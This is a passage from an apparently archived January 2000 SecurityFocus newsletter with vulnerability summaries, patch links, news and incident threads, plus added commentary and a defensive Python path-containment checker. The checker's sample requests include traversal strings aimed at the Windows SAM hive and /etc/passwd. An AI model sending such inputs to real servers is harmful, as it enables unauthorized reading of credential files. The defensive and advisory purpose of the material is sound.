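O_EXCL is what makes the check atomic: there is no window between "does the name exist?" and "create it" for a link to appear in. O_NOFOLLOW is belt and braces on platforms that have it (the getattr fallback keeps the code running elsewhere), and mkstemp removes the predictable name entirely, which is the right default for anything that runs as root.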
5. HP Path MTU Discovery DoS Vulnerability
BugTraq ID: 944
Remote: Yes
Date Published: 2000-01-24
Relevant URL:
http://www.securityfocus.com/bid/944
Summary:

A potential denial of service exists in Hewlett-Packard's proprietary
protocol for discovering the maximum path MTU (PMTU) for a given connection.
This feature could potentially be used to cause denial of service, using
HP-UX machines as "amplifiers." Essentially, HP machines which are vulnerable
can, under certain conditions, be coerced into sending far more data outbound
than they receive inbound. By forging source addresses, it is possible to
send a small quantity of packets purporting to be from a given source and
cause the HP-UX machine to send multiple packets in response. This could
potentially be used as a denial of service.

HP's proprietary path discovery protocol works by sending data in parallel
with the ICMP packets used for path discovery. While exact details of the
nature of the denial of service were not made public, presumably it could be
possible to utilize UDP packets, and default UDP services, to start the chain
of events leading to a denial of service.

6. Microsoft East Asian Word Conversion Vulnerability
BugTraq ID: 946
Remote: No
Date Published: 2000-01-20
Relevant URL:
http://www.securityfocus.com/bid/946
Summary:

East Asian language versions of Word and PowerPoint are susceptible to a
buffer overflow exploit. The overflowable buffer is in the code that converts
Word 5 documents into newer formats. Word 97, 98, and 2000 will automatically
convert older files into the new format upon loading. If a specially-modified
Chinese, Japanese or Korean Word 5 document is loaded into a newer version of
Word or PowerPoint, arbitrary code can be executed during the conversion
process, at the privilege level of the current user.

7. NT RDISK Registry Enumeration File Vulnerability
BugTraq ID: 947
Remote: No
Date Published: 2000-01-21
Relevant URL:
http://www.securityfocus.com/bid/947
Summary:

The Rdisk utility shipped with all versions of Windows NT 4.0 is used to make
an Emergency Repair Disk. During the creation of this disk, a temporary file
($$hive$$.tmp) is created in the %systemroot%\repair directory that contains
the registry hives while they are being backed up. The group Everyone has
Read permission to this file, and in this manner sensitive information about
the server could be leaked. The file is put in a location that is not shared
by default, and is removed immediately after the disk is created. The only
likely scenario where this could be exploited is in the case of NT Terminal
Server, where an administrator and a regular user could both be logged in
interactively at the same time.

8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
BugTraq ID: 948
Remote: Yes
Date Published: 2000-01-26
Relevant URL:
http://www.securityfocus.com/bid/948
Summary:

There is a remotely exploitable buffer overflow in Qualcomm's 'qpopper'
daemon which allows users already in possession of a username and password
for a POP account to compromise the server running the qpopper daemon. The
problem lies in the code that handles the 'LIST' command available to logged
in users. By providing an overly long user-supplied argument, a buffer may be
overflowed, resulting in the attacker gaining access with the user ID (UID)
of the user whose account is being used for the attack and the group ID (GID)
mail. This will result in remote access to the server itself and possibly
(depending on how the machine is configured) access to read system users'
mail via the GID mail.

9. NT Index Server Directory Traversal Vulnerability
BugTraq ID: 950
Remote: Yes
Date Published: 2000-01-26
Relevant URL:
http://www.securityfocus.com/bid/950
Summary:

Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The
functionality provided by Index Server has been built into Windows 2000 as
Indexing Services. When combined with IIS, Index Server and Indexing Services
include the ability to view web search results in their original context.
They will generate an HTML page showing the query terms in a short excerpt of
the surrounding text for each page returned, along with a link to that page.
This is known as "Hit Highlighting". To do this, they support the .htw
filetype, which is handled by the webhits.dll ISAPI application. This DLL
allows the use of the '../' directory traversal string in the selection of a
template file. This allows remote, unauthenticated viewing of any file on the
system whose location is known by the attacker.

III. PATCH UPDATES 2000-01-24 to 2000-01-30
-------------------------------------------

1. Vendor: Qualcomm
Product: Qpopper
Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow
Bugtraq ID: 948
Relevant URLs:
http://www.eudora.com/freeware/qpop.html#BUFFER
http://www.securityfocus.com/bid/948
Patch Location:
ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper3.0b31.tar.Z

2. Vendor: Microsoft
Product: Index Server for Windows NT and 2000
Vulnerability Patched: NT Index Server Directory Traversal
Bugtraq ID: 950
Relevant URLs:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/950
Patch Locations:
Index Server 2.0:
  Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
  Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
  Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726

3. Vendor: OpenBSD
Product: OpenBSD
Vulnerability Patched: Multiple Vendor BSD /proc File System
Bugtraq ID: 940
Relevant URLs:
http://www.openbsd.org/errata.html
http://www.securityfocus.com/bid/940
Patch Location:
http://www.openbsd.org/errata.html#procfs

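The check missing from webhits.dll (item 9 of the Bugtraq summary above) is containment: a template name taken from the request must resolve to a path inside the template directory, or be refused. The Python below is an added illustration of that check, not Microsoft's code; the root directory, the .htw extension rule and the request strings are constructed for the example.

```python
"""Containing a user-supplied template name under a fixed directory.

Added example, not Microsoft's code. The root path and requests are
constructed; the check is what an .htw handler would need before opening
whatever name the query string carried.
"""
import os


class TemplateError(ValueError):
    """Raised for any template name that must not be opened."""


def resolve_template(root, requested):
    """Return the on-disk path for `requested` if it stays inside `root`
    and names a .htw file; raise TemplateError otherwise. `requested` is
    expected to be already URL-decoded: checking the encoded form would
    miss '%2e%2e' style spellings of '..'."""
    if not requested or "\x00" in requested:
        raise TemplateError("empty or malformed template name")
    normalized = requested.replace("\\", "/")          # treat both separators alike
    if normalized.startswith("/") or (len(normalized) > 1 and normalized[1] == ":"):
        raise TemplateError("absolute template paths are not allowed")
    # Collapse '.', '..' and any symlinks, then compare against the resolved
    # root; prefix string checks alone would accept a sibling like root+'2'.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, normalized))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TemplateError(f"template escapes root: {requested!r}")
    if not candidate.lower().endswith(".htw"):
        raise TemplateError("only .htw templates may be loaded")
    return candidate


def classify(root, requests):
    """Map each request to True (would be served) or False (refused)."""
    verdicts = {}
    for req in requests:
        try:
            resolve_template(root, req)
            verdicts[req] = True
        except TemplateError:
            verdicts[req] = False
    return verdicts


if __name__ == "__main__":
    # Constructed requests: legitimate template names beside traversal attempts.
    sample = ["hits.htw", "sub/hits.htw", "sub/../hits.htw",
              "../../../winnt/repair/sam", "..\\..\\winnt\\repair\\sam",
              "/etc/passwd", "notes.txt", ""]
    for req, ok in classify("/srv/templates", sample).items():
        print(f"{'serve ' if ok else 'refuse'}  {req!r}")
```

Note that "sub/../hits.htw" is accepted: traversal that stays inside the root is harmless, and rejecting the literal string ".." instead of checking the resolved path is what leads handlers to be bypassed by alternative encodings. The realpath step also defeats a symlink placed under the template directory that points outside it.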
4. Vendor: FreeBSD
Product: FreeBSD
Vulnerability Patched: Multiple Vendor BSD /proc File System
Bugtraq ID: 940
Relevant URLs:
http://www.freebsd.org/security/
http://www.securityfocus.com/bid/940
Patch Location:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:02/procfs.patch

5. Vendor: Inter7
Product: vpopmail
Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow
Bugtraq ID: 942
Relevant URLs:
http://www.inter7.com/
http://www.securityfocus.com/bid/942
Patch Location:
http://www.inter7.com/vpopmail/ (version 3.1.11e)

6. Vendor: Microsoft
Product: NT 4.0 Terminal Server Edition
Vulnerability Patched: NT RDISK Registry Enumeration File
Bugtraq ID: 947
Relevant URLs:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/947
Patch Location:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17384

7. Vendor: Microsoft
Product: Office (All versions, including Word and PowerPoint)
Vulnerability Patched: Microsoft East Asian Word Conversion
Bugtraq ID: 946
Relevant URLs:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/946
Patch Locations:
- Word 97 or 98, PowerPoint 98:
  US:        http://officeupdate.microsoft.com/downloaddetails/ww5pkg.htm
  Japan:     http://officeupdate.microsoft.com/japan/downloaddetails/MalformedData-97.htm
  Korea:     http://officeupdate.microsoft.com/korea/downloaddetails/MalformedData-97.htm
  China:     http://officeupdate.microsoft.com/china/downloaddetails/MalformedData-97.htm
  Taiwan:    http://officeupdate.microsoft.com/taiwan/downloaddetails/MalformedData-97.htm
  Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/MalformedData-97.htm
- Converter Pack 2000; Office 2000 with Multilanguage Pack; Word 2000,
  PowerPoint 2000:
  US:        http://officeupdate.microsoft.com/2000/downloaddetails/ww5pkg.htm
  Japan:     http://officeupdate.microsoft.com/japan/downloaddetails/2000/MalformedData-2K.htm
  Korea:     http://officeupdate.microsoft.com/korea/downloaddetails/2000/MalformedData-2K.htm
  China:     http://officeupdate.microsoft.com/china/downloaddetails/2000/MalformedData-2K.htm
  Taiwan:    http://officeupdate.microsoft.com/taiwan/downloaddetails/2000/MalformedData-2K.htm
  Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/2000/MalformedData-2K.htm

8. Vendor: FreeBSD
Product: FreeBSD
Vulnerability Patched: Multiple Vendor BSD make /tmp Race Condition
Bugtraq ID: 939
Relevant URLs:
http://www.freebsd.org/security
http://www.securityfocus.com/bid/939
Patch Location:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:01/make.patch

IV.  SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
-----------------------------------------

1. Outpost Leaves Data Unguarded (Mon Jan 24 2000)
Excerpt:
While James Wynne was checking his online order Friday at Outpost.com, he
noticed something curious -- he could check orders from other people, too.
Relevant URL:
http://www.wired.com/news/technology/0,1282,33842,00.html

2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000)
Excerpt:
Japan said on Tuesday it will seek help from the United States in an
investigation into hackers who penetrated two government Web sites.
Relevant URL:
http://news.excite.com/news/r/000125/00/net-japan-hackers

3. Task Force Battles Online Criminals (Wed Jan 26 2000)
Excerpt:
Ground zero in California's war against Internet crime is behind a dumpster
hard by a hamburger stand in a faded Sacramento County welfare building. This
is the headquarters of the Sacramento Valley high-tech task force, a
multi-agency law enforcement team dedicated to tracking down e-crime, from
stock swindlers to child pornographers.
Relevant URL:
http://www.latimes.com/news/asection/20000126/t000008196.html

4. Smart card 'inventor' lands in jail (Thu Jan 27 2000)
Excerpt:
In another case destined to fuel e-commerce anxieties, a Parisian computer
programmer is facing counterfeiting and fraud charges after developing a
homemade "smart card" that he says gave him the ability to fraudulently
purchase goods and services throughout France.
Relevant URL:
http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html?chkpt=zdnnstop

5. Visa acknowledges cracker break-ins (Fri Jan 28 2000)
Excerpt:
Visa International Inc. acknowledged this week that computer crackers broke
into several servers in its global network last July and stole information.
The company said that in December, it received a phone call and an e-mail
demanding money in exchange for the data.
Relevant URL:
http://www.computerworld.com/home/print.nsf/all/000128e45a

6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000)
Excerpt:
In its review of the last 12 months, Sophos, the IT security firm, says that
1999 turned out to be a year when mass-mailed viruses arrived and dominated
the scene. The annual review says that virus writers are now taking advantage
of the Internet and corporate e-mail systems to distribute their creations
more quickly.
Relevant URL:
http://www.currents.net/newstoday/00/01/28/news8.html

V.   INCIDENTS SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------

1. Got scanned again (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=388C09A6.8EB8CC47@scalajwt.ro

2. Unusual scan pattern (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001241252.G29957@bluebottle.itss

3. Possible Probe = Possible Malfunction (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.3.32.20000125180337.008613b0@mail.9netave.com

4. No Idea (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3926668584.948819473@pc27233.utdallas.edu

5. PC Anywhere client seems to probe class C of connected networks (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.21.0001251657260.10263-100000@barrel.dt.ecosoft.com

6. unapproved AXFR (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001251742.C24564@bluebottle.itss

7. Connect thru PIX & ports 1727, 2209, 9200 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=D6C7B533F7C4D311BBD800001D121E7F0151D2@clmail.cmccontrols.com

8. Anti-Death Penalty (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001271722320.19098-100000@wr5z.localdomain

9. Strange DNS/TCP activity (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000127205611.23795.qmail@securityfocus.com

10. eri? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=200001281146.FAA20359@hank.cs.utexas.edu

11. source port 321 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=25608573.949079326302.JavaMail.imail@cheeks.excite.com

12. Korea (again) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000128080948.A24408@sec.sprint.net

13. BOGUS.IvCD File (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=389071D7.6A217C7C@relaygroup.com

14. port 768 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=87u2jyvahi.fsf@wiz.wiz

15. Extrange named messages (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.6.32.20000128103026.009ab760@mail.inforeti

16. Probes to tcp 2766 ('System V Listner') (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001281650150.29437-100000@unreal.sekure.org

17. Possible attempt at hacking? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=004701bf6934$22f4fd00$6500a8c0@techstart.com.au

18. DNS update queries: another sort of suspicious activity. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.05.10001281604430.24882-100000@ns.kyrnet.kg

VI.  VULN-DEV RESEARCH LIST SUMMARY 2000-01-24 to 2000-01-30
----------------------------------------------------------

1. Shadow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.21.0001250033010.7776-100000@stormbringer.eos.ncsu.edu

2. things to break.. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.BSF.4.05.10001251139570.30155-100000@mail.us.netect.com

3. HTTP scanners? (summary, long) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=388FD01F.A28F15BC@thievco.com

4. CGI insecurities (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.10.10001271034400.25323-100000@analog.rm-r.net

5. ICQ Pass Cracker. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=200001270941.UAA21537@buffy.tpgi.com.au

6. File Share Vacuum (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=18708.000128@frisurf.no

7. IIS4.0 .htw vulnerability (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4C95EE93836DD311AAA200805FED978904F2DB@mercury.globalintegrity.com

8. Napster a little insecure? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4.2.0.58.20000128171020.009c8ee0@mail.openline.com.br

9. distributed.net and seti@home (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=NDBBJPBMKLJJBCHBNEAIKECOCBAA.jlintz@optonline.net

VII. SECURITY JOBS SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------------

Seeking Employment:

1. Prashant V